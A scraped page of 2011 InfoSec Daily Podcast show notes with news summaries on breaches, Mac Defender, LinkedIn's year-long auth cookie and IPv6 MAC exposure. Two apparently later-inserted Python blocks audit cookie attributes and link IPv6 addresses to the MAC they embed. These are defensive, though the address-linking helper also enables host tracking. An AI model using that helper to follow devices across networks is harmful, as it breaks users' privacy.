Your daily source of Pwnage, Policy and Politics.

Episode 392 – Michael’s Liability, $170M & rising, Small Biz, Manning, Oakridge & Shoe Chucker

 

InfoSec Daily Podcast Episode 392 for May 23, 2011.  Tonight's podcast is hosted by Rick Hayes, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, and Varun Sharma.

Announcements:
LayerOne 2011
When: Saturday May 28th – Sunday May 29th
Where: Los Angeles, CA
http://www.layerone.org/

My Hard Drive Died
5-Day Data Recovery Expert Certification
Where: Atlanta, Georgia
When: June 6-10, 2011

5-Day Bootcamp Data Recovery
Where: Chicago, Illinois
When: July 18-22, 2011

#BSidesPGH
Where: 116 Federal St., Sunny Pittsburgh, PA.
When: June 10, 2011

http://www.securitybsides.com/w/page/38914998/BSidesPittsburgh

#BSidesCT
Where: Meriden, Connecticut
When: June 11, 2011

http://bsidesct.eventbrite.com

eXcon
Where: Meriden, Connecticut
When: June 11-12, 2011
http://excon.eventbrite.com  (email excon@nesit.net for more info)
Begins after BSidesCT. Registration cost is $50.00

#BSidesVienna
When: June 18, 2011
Where: Vienna, Austria
http://www.bsidesvienna.com
CFP now closed!

2nd Annual AIDE conference
When: July 11th – 15th, 2011
Where: Marshall University Forensic Science Center, Huntington, WV
http://aide.marshall.edu/

OISF July Anniversary Event
When: July 16th, 2011
Where: Dayton, Ohio
http://ohioinfosec.org
Adrian will be there

#BruCon
When: Sept 19-22, 2011
Where: Brussels, Belgium
http://blog.brucon.org/2011/02/confirmation-of-brucon-dates.html
CFP Closed!

@DerbyCon
When: September 30th – October 2, 2011
Where: Louisville, KY
http://www.derbycon.com/

2011 Fall Information Security Conference
When:  November 8 – 9, 2011
Where: Atlanta, GA (Loudermilk Conference Center)
http://www.gaissa.org
CFP open now through June 3, 2011! Email submissions to Conference@gaissa.org

EFF:
The ISD Podcast has entered into a contest to see who can raise the most money for the Electronic Frontier Foundation.  For those who don’t know, the EFF is a non-profit group of lawyers, policy analysts, activists, and technologists who fight for digital rights and have helped countless hackers and security researchers get out of hot water as well as exposing injustices caused by ignorant legislation and bad judgements.  Please click the following link to donate to a vitally important cause:
http://action.eff.org/site/TR/Contest/Advocacy?team_id=1730&pg=team&fr_id=1060

Stories
Source:  http://www.bankinfosecurity.com/articles.php?art_id=3668

A Chicago consumer affected by the Michaels card breach has filed a federal lawsuit against the crafts retailer, claiming it should have better protected customers' cards from breach and compromise.

Brandi F. Ramundo had more than $1,300 withdrawn from her checking account, after reportedly making a debit purchase worth less than $20 at Michaels. Her five-count suit seeks class-action status, a jury trial, compensatory damages, and consequential and statutory damages. It also includes an order for Michaels to pay for card-fraud monitoring services for consumers hit by the scam, as well as compensation and punitive damages for costs associated with the suit.

Ramundo's suit raises questions about liability after a card breach fraud. What role should merchants play, when it comes to ensuring transactional security, and how should financial institutions, as card-issuers, fall into the fray?

Attorney Randy Sabett, partner and co-chair of the Internet and Data Protection practice at law firm SNR Denton LLP, says the liability lines are often blurred and hard to define after a breach. Despite that card fraud usually occurs outside banking institutions' control, banks and credit unions, as the card issuers, usually absorb losses and expenses associated with breach recovery.

Source:http://www.pcworld.com/article/228391/playstation_network_hack_will_cost_sony_170m.html

Sony expects the hack of the PlayStation Network will cost it ¥14 billion (US$170 million) this financial year, it said Monday.

Unknown hackers hit the network gaming service for PlayStation 3 consoles in April, penetrating the system and stealing personal information from the roughly 77 million accounts on the PlayStation Network and sister Qriocity service. A second attack was directed at the Sony Online Entertainment network used for PC gaming.

Sony responded to the attacks by taking the systems offline. It called in several computer security companies to conduct forensic audits and rebuilt its security system.

Users in many countries are being offered a year-long identity-theft protection program and free games. The cost estimate includes those actions and associated legal costs, said Masaru Kato, Sony's CFO, at a Tokyo news conference.

"To date, we have not confirmed any misuse of personal information or credit cards," said Kato.
The costs will be booked in Sony's current financial year, which will end on March 31.
Sony said it made the announcement because it expects to record a net loss of ¥260 billion for the financial year just ended due to charges associated with U.S. GAAP (generally accepted accounting practices) rules.

The March 11 earthquake and tsunami occurred just three weeks before the end of the financial year and didn't have a large impact on the company's global financial performance for the year, but it did push Sony's Japanese operations into a loss.

Those Japanese operations had lost money the previous two years but Sony, anticipating a profit in the year just ended, had recorded tax credits it intended to carry forward. However, GAAP rules say tax credits cannot be recorded for three years in a row, so Sony is recording a non-cash charge for the credits it had taken.

The earthquake hit Sony's domestic operations and led to a sharp fall in consumer demand in Japan in the last weeks of March, but its effect on the results for Sony's electronics business was limited because it occurred so close to the end of the financial year. Sony estimates that resulted in a ¥22 billion drop in sales and ¥17 billion in quake-related costs.

Overall, the company said sales in the previous year were around ¥7.2 trillion.

The company will report an operating profit of around ¥200 billion, but the GAAP-related charge will help push Sony to a net loss of around ¥260 billion. Operating income more closely tracks the company's performance in its core areas and excludes many one-off charges.

Sony will report actual results for the financial year from April 2010 to March 2011 on Thursday.

Geordy’s comments: This number seems way too low.  That’s less than $1.70 per person/record.  In Ponemon’s most recent study, the AVERAGE number was $214 per record.  While Ponemon’s study does state that US breaches tend to cost companies more than foreign ones, I call shenanigans…

Source: http://www.latimes.com/business/la-fi-smallbiz-security-20110523,0,5494792.story

It took all of three minutes for the hacker to break into the small accounting firm's computer system.

The virtual open window into the system turned out to be a computer equipped with outdated software. It provided access to the office network and the hacker was able to get files that included private financial information.

"That was a shock," said Lynne Leavitt, a partner at the four-person Los Angeles firm, Brakensiek Leavitt Pleger. "I thought we had good security. I thought we were safe."

Luckily, it was just a test. The hacker had been employed by a security company to test the accountants' digital defenses. As a result, the firm put in new software and adopted new security procedures.

Cyber security is not just for big businesses. "That's one of the myths we come across — 'I am too small,'" said Stan Stahl, head of a Los Angeles cyber-security company Citadel Information Group Inc. and president of the Los Angeles chapter of the Information Systems Security Assn., a trade group.

Source:  http://www.wired.com/threatlevel/2011/05/bradley-manning-in-boston/

In January 2010 when Army intelligence analyst Bradley Manning was allegedly contemplating leaking thousands of classified documents to WikiLeaks, he visited friends in Boston, who brought him to a party at Boston University’s BUILDS hacker space.

Frontline, which is airing a documentary about Manning and WikiLeaks on May 24, has obtained a video showing Manning at the party.

At the time of the party, Manning was on a two-week leave from his assignment in Iraq. It was at one point during this trip that he told friend Tyler Watkins that he’d gotten his hands on classified information that he was thinking about leaking, according to Watkins. “He wanted to do the right thing,” Watkins said in an interview with Threat Level last June. ”That was something I think he was struggling with.”

The video shows Manning at the BUILDS party, small in stature compared to the hackers around him, leaning against a table while chatting with friend Danny Clark (in a red t-shirt at Manning’s left).

Source:  http://www.knoxnews.com/news/2011/may/21/ornl-may-add-security-role/

Oak Ridge National Laboratory has become America's hub for scientific supercomputing, hosting the Department of Energy's top supercomputer (Jaguar) as well as the top-rated machines of the National Science Foundation (Kraken) and the National Oceanic and Atmospheric Administration (Gaea, Mother Earth).

Now it appears that a push to expand the Oak Ridge role could bring U.S. security agencies into the fold.

During a recent visit to Oak Ridge, DOE science chief William Brinkman said security agencies are supporting a plan, currently under review at the U.S. Office of Management and Budget, to use private financing for construction of a major new computer center at ORNL.

"They want to put some of their own computers down here," he said.

Source: http://www.pcworld.com/businesscenter/article/228274/chinas_great_firewall_a_big_inconvenience_shoe_thrower.html

The man who threw a shoe at the architect of China's Internet censorship systems on Thursday, said he did so because the censorship has made his life inconvenient.

"I spend money to buy all this official software, but I can't use it (because of the censorship). This has made me really unhappy," the man said in an email message. He did not specify what software he is using.

Chinese microblogs have been abuzz with postings about Fang Binxing, often called "Father of China's Great Firewall", being hit with a shoe while speaking at Wuhan University. The assailant tweeted about the act on his Twitter account, adding that he also threw eggs at Fang, which missed.

No official information has been released about the incident, although some Chinese news reports on the shoe-throwing have made it online. The assailant, whose Twitter account is at @hanunyi, confirmed that he had committed the act in his e-mail.

The man, who didn't reveal his identity when asked, said he hadn't planned on throwing the shoe, believing that Fang would be speaking at a large event. But upon arriving, he found it to be a "small reception". His Twitter post mentioned only 30 people were in attendance.

Since throwing the shoe, the assailant has received praise on Chinese microblogs, with some users calling him a hero. Many others have said Fang deserved it.

The assailant said he was surprised by the response.

"I didn't think it would have such a big impact," he said. "Maybe a lot of people are the victim of a bad system."

China deploys an extensive Internet censorship system that blocks sites like Twitter, Facebook and YouTube in an attempt to clamp down on politically sensitive content.

The system goes as far as to prevent certain politically sensitive queries on Chinese search engines and microblogs, with Internet censors even deleting posts made on social networking sites in the country.

In the past months, the country's censorship has reached new levels, following an online protest call urging the Chinese people to hold a "Jasmine Revolution" against the government.

In March, Google reported the Chinese government was blocking Gmail access. Companies offering virtual private networks (VPNs), which allow users to view sites and content blocked by Chinese Internet censors, also reported that their services were facing access problems in the country.

Fang, the president of Beijing University of Posts and Telecommunications, has been at the receiving end of criticism from Chinese netizens before. In December, Fang set up a Chinese microblogging account operated by Sina. Users on the site, however, slammed Fang via posts on the microblog, for developing China's Internet censorship systems. Fang's postings, as well as the comments left behind, were removed from the account. The account continues, but is no longer searchable on the microblogging site.

Source: http://www.reuters.com/article/2011/05/22/linkedin-security-idUSN2212591020110522
LinkedIn site has security vulnerabilities - expert

LinkedIn's professional networking website has security flaws that make users' accounts vulnerable to attack by hackers who could break in without ever needing passwords, according to a security researcher who identified the problem.

News of the vulnerability surfaced over the weekend, only days after LinkedIn Corp (LNKD.N) went public last week with a trading debut that saw the value of its shares more than double, evoking memories of the dot.com investment boom of the late 1990s.

Rishi Narang — an independent Internet security researcher based near New Delhi, India, who discovered the security flaw — told Reuters on Sunday that the problem is related to the way LinkedIn manages a commonly used type of data file known as a cookie.

After a user enters the proper username and password to access an account, LinkedIn's system creates a cookie "LEO_AUTH_TOKEN" on the user's computer that serves as a key to gain access to the account.

Lots of websites use such cookies, but what makes the LinkedIn cookie unusual is that it does not expire for a full year from the date it is created, Narang said.

He detailed the vulnerability in a posting on his blog at www.wtfuzz.com on Saturday.

Most commercial websites would typically design their access token cookies to expire in 24 hours, or even earlier if a user were to first log off the account, Narang said.

There are some exceptions: Banking sites often log users off after 5 or 10 minutes of inactivity. Google gives its users the option of using cookies that keep them logged on for several weeks, but it lets the user decide first.

The long life of the LinkedIn cookie means that anybody who gets hold of that file can load it on to a PC and easily gain access to the original user's account for as much as a year.

The company issued a statement saying that it already takes steps to secure the accounts of its customers.

"LinkedIn takes the privacy and security of our members seriously," the statement said.

"Whether you are on LinkedIn or any other site, it's always a good idea to choose trusted and encrypted WiFi networks or VPNs (virtual private networks) whenever possible."

The company said that it currently supports SSL, or secure sockets layer, technology for encrypting certain "sensitive" data, including account logins.

But those access token cookies are not yet scrambled with SSL. That makes it possible for hackers to steal the cookies using widely available tools for sniffing Internet traffic, Narang said.

LinkedIn said in its statement that it is preparing to offer "opt-in" SSL support for other parts of the site, an option that would cover encryption of those cookies. The company said it expected that to be available "in the coming months."

But LinkedIn officials declined to respond to Narang's critique of the company's use of a cookie with a one-year expiration.

Narang said that problem is particularly acute because LinkedIn's users are not aware of the problem and have no idea that they should be protecting those cookies.

He said he found four cookies with valid LinkedIn access tokens had been uploaded to a LinkedIn developer forum by users who were posting questions about their use.

He said he downloaded those cookies and was able to access the accounts of the four LinkedIn subscribers.
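The story turns on two cookie properties: how long the access token stays valid, and whether it is only ever sent over an encrypted connection. The following is an added example, not LinkedIn's code or anything from the Reuters report: a small audit routine that parses Set-Cookie headers and flags an access-token cookie that is missing the Secure or HttpOnly attributes or that outlives a one-day policy (the policy threshold, the sample header values, the domain and the pinned "now" date are all constructed for the example; only the cookie name comes from the story).

```python
"""Audit Set-Cookie headers for access-token hygiene.

Added example (not LinkedIn's code). The two headers below are constructed
to mirror the situation the story describes: an authentication cookie that
stays valid for a year and is not restricted to encrypted connections,
beside a hardened equivalent. The cookie name is from the story; the value,
domain and policy threshold are placeholders chosen for the example.
"""
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime
from typing import Dict, List, Optional

ONE_DAY = 24 * 3600
MAX_TOKEN_LIFETIME = ONE_DAY  # assumed policy: an access token should expire within a day

# Constructed samples; "now" is pinned so the lifetime arithmetic is reproducible.
NOW = datetime(2011, 5, 23, tzinfo=timezone.utc)
WEAK_COOKIE = ("LEO_AUTH_TOKEN=EXAMPLE_TOKEN_VALUE; Path=/; Domain=.example.com; "
               "Expires=Tue, 22 May 2012 00:00:00 GMT")
HARDENED_COOKIE = "LEO_AUTH_TOKEN=EXAMPLE_TOKEN_VALUE; Path=/; Max-Age=3600; Secure; HttpOnly"


def parse_set_cookie(header: str) -> Dict[str, object]:
    """Split a Set-Cookie header into name, value and lower-cased attributes."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs: Dict[str, str] = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()  # flag attributes (Secure, HttpOnly) map to ""
    return {"name": name.strip(), "value": value, "attrs": attrs}


def cookie_lifetime_seconds(cookie: Dict[str, object], now: datetime) -> Optional[int]:
    """Lifetime in seconds from Max-Age (takes precedence) or Expires; None means session cookie."""
    attrs = cookie["attrs"]
    if "max-age" in attrs:
        return int(attrs["max-age"])
    if "expires" in attrs:
        expires = parsedate_to_datetime(attrs["expires"])
        if expires.tzinfo is None:  # parsedate returns naive datetimes for "-0000"
            expires = expires.replace(tzinfo=timezone.utc)
        return int((expires - now).total_seconds())
    return None


def audit_cookie(header: str, now: datetime) -> List[str]:
    """Return policy findings for one Set-Cookie header; an empty list means it passes."""
    cookie = parse_set_cookie(header)
    attrs = cookie["attrs"]
    findings: List[str] = []
    if "secure" not in attrs:
        findings.append("missing Secure: the token travels over plaintext HTTP and can be sniffed")
    if "httponly" not in attrs:
        findings.append("missing HttpOnly: the token is readable by script running in the page")
    lifetime = cookie_lifetime_seconds(cookie, now)
    if lifetime is not None and lifetime > MAX_TOKEN_LIFETIME:
        days = lifetime // ONE_DAY
        findings.append(f"lifetime {days} days exceeds the 1-day policy; a stolen cookie stays valid that long")
    return findings


if __name__ == "__main__":
    for label, header in (("weak", WEAK_COOKIE), ("hardened", HARDENED_COOKIE)):
        print(label, audit_cookie(header, NOW) or ["ok"])
```

Max-Age is checked before Expires because that is the precedence browsers apply when both are present. The check is deliberately server-side and offline: it reads the header text a deployment would emit, so it can run in a build or configuration review before the cookie ever reaches a user.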

Episode 391 – Another LIGATT?, Apple plays dumb, AppSec < Starbucks, WACA WACA, Moving Target, Good Norwegian, Cyber Elite & The Rapture

InfoSec Daily Podcast Episode 391 for May 20, 2011.  Tonight's podcast is hosted by Rick Hayes, Karthik Rangarajan, Geordy Rostad, Keith Pachulski, and Varun Sharma.

Stories
Source: Coming Soon!

Another Ligatt?  We have a huge Ligatt style story that is just developing.  We expect to have more news on this as it develops, but we certainly want you to know that some folks never sleep and they will find those folks that are out there.

Source: http://www.theregister.co.uk/2011/05/20/apple_malware_attacks/

Apple officials have instructed members of the company's support team to withhold any confirmation that a customer's Mac has been infected with malware or to assist in removing malicious programs, ZDNet's Ed Bott reported on Thursday.

He cited an internal document titled "About 'Mac Defender' Malware," which was last updated on May 16 and says that the trojan, which surfaced earlier this month and masquerades as legitimate security software for the OS X platform, is an "Issue/Investigation In Progress."

"AppleCare does not provide support for removal of the malware," the document, which was labeled confidential, stated. "You should not confirm or deny whether the customer's Mac is infected or not."

The memo's disclosure comes as the number of reported Mac attacks has skyrocketed, Bott said. According to an earlier article he published, he recently found more than 200 separate discussion threads on discussions.apple.com in which users complained of infections that caused their Macs to behave erratically.

"Porn sites just started popping up on my MacBook Pro," one user wrote. "Is this a virus? I have never had a virus on a Mac before and I have been using Macs for years. Please help!"

The con artists behind Mac Defender hook their victims by presenting Mac-using web surfers with images that depict an antivirus scan taking place on their machines. The images falsely claim users are infected with serious malware and urge them to download and install the antivirus package. Those who fall for the ruse are then infected. Similar scams have plagued Windows users for years, often to the delight and scorn of Mac and Linux fans.

According to a third article penned by Bott, AppleCare reps are seeing a four- to five-fold increase in the number of calls requesting support for rogue antivirus scams targeting the Mac.

Source: http://crashdex.com/2011/05/73-of-organizations-hacked-in-the-last-2-years/

Website attacks are the biggest concern for companies, yet 88 percent spend more on coffee than securing Web applications, according to a survey by Barracuda Networks, Cenzic and the Ponemon Institute.

According to 74 percent of respondents, Web application security is either more critical or equally critical to other security issues faced by their organizations. Despite this, the study shows there are many misconceptions around the methods used to secure Web applications, primarily Web application firewalls and vulnerability assessment.

“While it is encouraging to see that Web application security is on the minds of most organizations, there still seems to be a real disconnect between the desire and implementation of security countermeasures required for Web application security,” said Dr. Paul Judge, chief research officer and VP for Barracuda Networks.

“The fact that 69 percent of respondents are relying upon network firewalls to secure Web applications is like relying upon a cardboard shield for protection in a sword fight – eventually your shield will prove that it’s insufficient and an attack will reach you that can fly past a network firewall,” he added.

“The fact that a quarter of respondents could not provide a range for how many Web applications they have is a huge red flag right off the bat,” said Mandeep Khera, CMO for Cenzic. “Furthermore, that 20 percent of organizations do not test at all and 40 percent test only 5 percent of their Web applications is shocking. And, most of these companies have been hacked multiple times through insecure Web applications. If you know that burglars come through a broken door repeatedly wouldn’t you want to fix that door?”

Other key findings in the study include:

  • Data protection (62 percent) and compliance (51 percent) were the top reasons for securing Web apps. Job protection was also a significant reason cited by 15 percent of respondents.
  • Despite 51 percent listing compliance as a key driver for Web application security, 43 percent are not familiar with or have no knowledge of OWASP, a key component to compliance standards like PCI.
  • With 41 percent reporting they have over 100 Web applications or more, the majority (66 percent) test less than 25 percent of these applications for vulnerabilities.
  • More than half (53 percent) expect their Web hosting provider to secure their Web applications.
  • Of those respondents who own a Web application firewall, nearly twice as many agreed that a reverse proxy is a better and more secure technology than a transparent bridge technology.

“While IT practitioners recognize the criticality of secure Web applications, their organizations do not provide adequate resources and expertise to manage the risk,” said Dr. Larry Ponemon, chairman and founder, Ponemon Institute. “Over half of the respondents we polled believe they do not have resources to detect and remediate insecure Web applications, and 64 percent said they believe that their organization have inadequate governance and usage policies.”

Source: http://bink.nu/news/microsoft-web-application-configuration-analyzer-v2-0.aspx

Web Application Configuration Analyzer (WACA) analyzes server configuration for security best practices related to General Windows, IIS, ASP.NET and SQL Server settings.

Web Application Configuration Analyzer (WACA) is a tool that scans a server against a set of best practices recommended for pre-production and production servers. It can be used by developers to ensure that their codebase works within a secure / hardened environment (although many of the checks are not as applicable for developers). The list of best practices is derived from the Microsoft Information Security & Risk Management Deployment Review Standards used internally at Microsoft to harden production and pre-production environments for line of business applications. The Deployment Review standards themselves were derived from content released by Microsoft Patterns & Practices, in particular: Improving Web Application Security: Threats and Countermeasures available at: http://msdn.microsoft.com/en-us/library/ms994921.aspx. It uses an agent-less scan that requires the user to have admin privileges on the target server, as well as any SQL Server instances running on that machine.

In this release of WACA we included some new features. They include:

  • Suppressions – you can now suppress any rule you feel is not appropriate for your scan.
  • Saving of suppression files – once you set up a suppression list you want to use you can save it off for future uses.
  • You can change the suppressions and regenerate the report without needing to re-run the scan.
  • Reporting – Updated the reporting section to include suppression information so you know what passed, failed, was not applicable and what was suppressed.
  • Multiple reports – you can view multiple scans of the same machine or view a single machine’s scan and compare it to other machines.
  • Export to the Microsoft RED format.
  • Scan multiple systems and SQL instances in one bulk scan.
  • Additional rules – we’ve added in additional SQL rules.
  • And of course bug fixes that were missed in the last release.


Source: http://searchsecurity.techtarget.com/news/2240035990/IPv6-connectivity-Innovations-address-IPv6-security-concerns

Internet Protocol version 6 (IPv6) is coming soon to an enterprise near you, but few organizations have invested much time or effort into understanding how it works, never mind how to secure it. Yet enterprises could stand to learn something from the students and staff at Virginia Tech, which was recently lauded for an innovative new technology that secures IPv6 network communications.

A team from the Blacksburg, Va.-based university’s Information Technology Security Laboratory was recognized by the National Homeland Defense Foundation, which is a nonprofit forum for responding to terrorism tactics and natural disasters, for creating a security tool called Moving Target IPv6 Defense (MT6D).

MT6D solves one of a number of unique IPv6 security concerns that don’t exist in IPv4. In short, an IPv6 address consists of two parts: a 64-bit network prefix, and a 64-bit host address. The first part is determined by the network, but the host address by default is determined by the device’s MAC address.

According to Stephen Groat, a Ph.D. student in computer engineering at Virginia Tech, in this scenario, a machine’s IPv6 address would expose its MAC address, making a machine easy to track by a potential attacker.

“In IPv6, it takes centuries to scan a single subnet,” Groat said. “But once an attacker knows that MAC address, this lets an attacker pretty much do anything they want to a system.”

Groat said, with a little homework, attackers could use the IPv6 address to learn who the manufacturer of the system is, and also collect traffic over multiple sessions: Even when a device disconnects and reconnects, the MAC address portion of the IPv6 address remains unchanged.

There are mechanisms that exist today to obfuscate IPv6 client addresses to some degree, like IPv6 privacy extensions in Windows 7, but Groat said the Virginia Tech team wanted to protect both ends of a session; privacy extensions may protect clients, but servers can’t change their addresses without terminating a session.
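The passage above describes the default SLAAC behaviour: the host half of the address is the modified EUI-64 identifier built from the MAC (RFC 4291, appendix A), so the same device shows the same lower 64 bits on every network it joins. The following is an added example, not the Virginia Tech team's MT6D code or anything from the article: it derives the identifier the way a host would, and then does the inverse as an inventory check, picking out addresses on your own network that still embed a MAC so those hosts can be moved to privacy extensions (the random-looking address, the MAC and the 2001:db8::/32 documentation prefix are constructed for the example).

```python
"""Find IPv6 addresses whose interface identifier embeds a MAC (modified EUI-64).

Added example, not MT6D. The MAC, the addresses and the documentation
prefix 2001:db8::/32 below are constructed for illustration.
"""
import ipaddress
from typing import Dict, Iterable, Optional

# Constructed inventory: two SLAAC addresses of the same device on two different
# networks, plus one address generated with privacy extensions (RFC 4941).
SAMPLE_ADDRESSES = [
    "2001:db8:1:2:21b:21ff:fe3a:4b5c",
    "2001:db8:ffff:9:21b:21ff:fe3a:4b5c",
    "2001:db8:1:2:a1b2:c3d4:e5f6:789a",
]


def eui64_interface_id(mac: str) -> bytes:
    """Build the 64-bit modified EUI-64 identifier from a 48-bit MAC."""
    octets = bytes.fromhex(mac.replace(":", "").replace("-", ""))
    if len(octets) != 6:
        raise ValueError("MAC must be 48 bits")
    # ff:fe is inserted between the OUI and the NIC-specific half,
    # then the universal/local bit (0x02 of the first octet) is flipped.
    iid = bytearray(octets[:3] + b"\xff\xfe" + octets[3:])
    iid[0] ^= 0x02
    return bytes(iid)


def slaac_address(prefix: str, mac: str) -> ipaddress.IPv6Address:
    """The address a host autoconfigures from a /64 prefix and its MAC."""
    net = ipaddress.IPv6Network(prefix, strict=False)
    if net.prefixlen != 64:
        raise ValueError("SLAAC needs a /64 prefix")
    iid = int.from_bytes(eui64_interface_id(mac), "big")
    return ipaddress.IPv6Address(int(net.network_address) + iid)


def embedded_mac(addr: str) -> Optional[str]:
    """Inverse of the derivation: the MAC an EUI-64 style address encodes, else None."""
    iid = ipaddress.IPv6Address(addr).packed[8:]
    if iid[3:5] != b"\xff\xfe":  # privacy-extension identifiers lack the ff:fe marker
        return None
    first = iid[0] ^ 0x02  # undo the U/L bit flip
    mac = bytes([first]) + iid[1:3] + iid[5:]
    return ":".join(f"{b:02x}" for b in mac)


def same_host(addr_a: str, addr_b: str) -> bool:
    """True when two addresses (possibly on different networks) embed the same MAC."""
    mac_a, mac_b = embedded_mac(addr_a), embedded_mac(addr_b)
    return mac_a is not None and mac_a == mac_b


def flag_eui64_hosts(addresses: Iterable[str]) -> Dict[str, str]:
    """Inventory check: map each trackable address to the MAC it exposes."""
    flagged = {}
    for addr in addresses:
        mac = embedded_mac(addr)
        if mac is not None:
            flagged[addr] = mac
    return flagged


if __name__ == "__main__":
    print(slaac_address("2001:db8:1:2::/64", "00:1b:21:3a:4b:5c"))
    for addr, mac in flag_eui64_hosts(SAMPLE_ADDRESSES).items():
        print(f"{addr} exposes MAC {mac}; enable privacy extensions on this host")
```

The ff:fe marker is what makes the check cheap: any address carrying it in the middle of the interface identifier was almost certainly built from a MAC, while privacy-extension and manually assigned addresses normally do not carry it. The same_host helper shows the cross-session correlation the article warns about from the defender's side, which is exactly what MT6D's address hopping is meant to break for servers that cannot simply switch to random identifiers.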

That’s where MT6D comes in. It serves to create an algorithm that allows a pair of network hosts to change their addresses dynamically in a way that each host can predict the other’s next address, creating a network tunnel. The technology could be deployed as a stand-alone appliance on a network to secure a subnet or be built into specialized network devices like smart grid electric meters, but it’s likely to be made available to vendors for inclusion in commercial networking and security products.

While MT6D solves one IPv6 security problem, there are still a number of others. Few network security products today offer robust support for IPv6, Groat said, and those that claim to often haven’t been tested in a large-scale IPv6 environment like the Virginia Tech network, which has been in place since 2005 and features 30,000 nodes. Often, organizations have IPv6-enabled devices and don’t realize it, opening the door for malware to use IPv6 as an unmonitored back-channel. And that’s just for starters.

“We have someone here who also works for a hosting firm, and at the hosting firm they can’t turn on v6 support for their mail servers because they have v4-only blacklists,” Groat said. “So if they turn on v6, they’ll suddenly get all this spam. The other question is, ‘How do you create a blacklist for v6?’ Since hosts can change their addresses so frequently, do you block whole subnets? These are real problems people haven’t solved yet.”

Fortunately, with World IPv6 Day coming on June 8 – a one-day IPv6 connectivity awareness initiative where many global network and website operators like Google and Facebook will turn on IPv6, just to see what happens — everyone will get a chance to see what an IPv6 Internet looks like. Though some believe the event will mostly be a PR stunt and simply raise awareness for the upcoming transition across the Internet, count the Virginia Tech team among those who believe it could be a disruptive event.

“I think a lot of websites will break,” said William Urbanski, a security analyst with the Virginia Tech IT security office. “I think end users are going to see misconfigurations on commercial ISPs.”

Still, World IPv6 day and the MT6D tool should serve to help enterprise security teams ponder how their security tactics must evolve as IPv6 takes hold.

Source:   http://www.newsinenglish.no/2011/05/19/military-fends-off-major-cyber-attack/

Norwegian military personnel were the targets of what’s being described as a "massive" cyber attack this spring, one day after Norway started bombing Libya with other UN- and NATO-backed forces. Newspaper VG reported Thursday that they fended off the attack, which was considered the most serious ever experienced.

It came in the form of an e-mail written in what was said to be "good Norwegian" that looked like it had been sent by another Norwegian government agency. It contained an attachment, however, that when opened unleashed a computer virus that could have opened up military PCs to the attackers.

Several hundred defense ministry employees received the same e-mail, reported VG. One employee opened the attachment, allowing the unknown attackers to gain access to that employee’s PC, but the virus was then quickly discovered and warnings issued.

The attackers didn’t succeed with further infiltration, claimed Major General Roar Sundseth, adding that they also failed to obtain classified information before the attack was discovered.

Source:  http://english.donga.com/srv/service.php3?bicode=060000&biid=2011051977548

North Korea has as many as 30,000 electronic warfare specialists as part of the elite core of the North's military, Fox News said Tuesday.

Quoting U.S. and South Korean intelligence, the U.S. network said Washington and Seoul believe that the U.S. CIA can match Pyongyang's capability in cyber warfare.

Fox quoted North Korean leader Kim Jong Il as telling his military several years ago, “Modern war is electronic warfare. Victory or defeat in a modern war depends on how to carry out electronic warfare.” He has since made cyber warfare a top albeit secret priority of his paranoid regime, it added.

Among the most frequent visitors to U.S. military websites are computers traced to North Korea, according to the U.S. Defense Department. Much like the clandestine nuclear program run by the rogue state, its cyber warfare capability is shrouded in secrecy.

Source:  http://heavemedia.com/2011/05/20/the-rapture-2011/

May 21st begins “The Rapture of 2011”. This is the day that Jesus Christ will come back to earth (but probably not Kentucky) and resurrect the dead bodies of true “saved” Christians while simultaneously lifting still living Christians into the air, while plaguing the rest of us with earthquakes, floods, and locusts that will sting the shit out of us…FOR 5 FUCKING MONTHS!  There will be a rapture party, clothing optional, at the Hard Rock in Las Vegas at 6 pm local time for those that are interested.  

With all this talk of Rapture, it amazes me that there hasn’t been any malware.  Then it occurred to me that the event, or the notion of the event, is malware enough and perhaps those hedonistic developers thought that maybe we needed a break.  Maybe not, but only time will tell.

Episode 390 – CEO of Anonymous quits, SCADA talk cancelled, Android fix, .htshell, HHS OIG & Mossad

InfoSec Daily Podcast Episode 390 for May 19, 2011.  Tonight's podcast is hosted by Rick Hayes, Adrian Crenshaw, Karthik Rangarajan, and Varun Sharma.


Stories

Source:http://threatpost.com/en_us/blogs/barrett-brown-public-face-anonymous-leaves-group-051611

Barrett Brown, the reporter who became a media-friendly spokesperson for the shadowy hacking group Anonymous, says that he is quitting the group in the wake of a public feud that has broken out between different hacker factions within the loosely organized collective.

Brown told Threatpost that he and around two dozen Anonymous members are forming a splinter group to focus on efforts to root out what Brown has described as "criminality and corruption" within the U.S. Government, U.S. military, corporations and the media.

Brown, a journalist and author, has been the public face and chief apologist for the anarchic and leaderless group during recent controversies, including the hack of security firm HBGary. He said recent feuds between different Anonymous factions, culminating in the recent takeover of two IRC chat servers used by the group, convinced him that the group had lost its way.

"I'm tired of the drama," Brown told Threatpost in a phone interview May 10. "You've got kids fighting for control of an IRC channel. I'm a researcher. I'm into revolutionary stuff. But there are other people for whom it's about exerting power," he said.

Brown told Threatpost he is defecting with what he claims are around two dozen Anonymous members. He said he planned to focus on Project PM – an effort to create an umbrella group that will support other organizations that want to expose pro-government and pro-corporate bias in the media.

The parting of ways between Brown and the allegedly "leaderless" group comes at a perilous time. Recent months have seen defectors from the group publish potentially damaging information that could be used to identify active members. In March, a splinter group calling itself Backtrace Security published a document that claimed to identify or partially identify 80 members of Anonymous's leadership. The group launched OpSony in April to retaliate against Sony's legal pursuit of hackers, like George Hotz, who had circumvented security features of PlayStation devices. A massive compromise of Sony's PlayStation Network followed, which Anonymous has steadfastly denied responsibility for. Then, in May, a feud erupted between high-level members of Anonymous that led to the hostile takeover of two Web domains used by the group to host IRC (Internet Relay Chat). Subsequent to the takeover, an Anonymous administrator known as "Ryan" spilled information online that could, potentially, be used to link participants in Anonymous online chats with individuals in the real world. Anonymous members have since been forced to shift their activities to IRC forums not hosted on Anonops.ru and Anonops.net, both of which were taken over by "Ryan."

Brown's relations with Anonymous's membership were testy at times. Within the last year, he had transitioned from a journalist covering Anonymous's activities for publications like The Huffington Post to an informal spokesman for the group: giving interviews with the press and writing press releases. His frequent mentions in the press, where he was occasionally identified as Anonymous's spokesman, drew the ire of other Anonymous members who accused him variously of hogging the spotlight and drawing unwanted attention to the group. Brown, himself, disavowed any leadership role in the group, which he maintained was leaderless. However others, notably Aaron Barr of HBGary, have contested the idea that the group lacks a hierarchy and established leadership.

